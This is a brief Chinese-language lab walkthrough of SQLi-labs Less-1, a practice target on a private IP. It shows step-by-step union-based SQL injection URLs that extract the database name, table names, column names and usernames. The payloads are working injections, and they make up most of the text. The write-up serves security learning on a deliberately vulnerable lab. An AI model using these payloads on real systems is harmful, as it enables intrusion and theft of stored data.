SQL注入实验——web靶机第一关

  1. 测试交互方法(此靶机为get);
  2. 判断字符类型;(此靶机没报错,为字符型)
    SQL注入实验——web靶机第一关_第1张图片
  3. 构造闭合(次靶机闭合为 ‘ );
    SQL注入实验——web靶机第一关_第2张图片
  4. 爆库名;
    http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,database() --+
    SQL注入实验——web靶机第一关_第3张图片
  5. 爆表名;
    http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(table_name) from information_schema.tables where TABLE_schema = 'security' --+

SQL注入实验——web靶机第一关_第4张图片
6. 爆列名;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(column_name) from information_schema.columns where TABLE_name = 'users' and table_schema = 'security' --+
SQL注入实验——web靶机第一关_第5张图片
7. 爆数据;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(username) from users --+
SQL注入实验——web靶机第一关_第6张图片

你可能感兴趣的:(安全)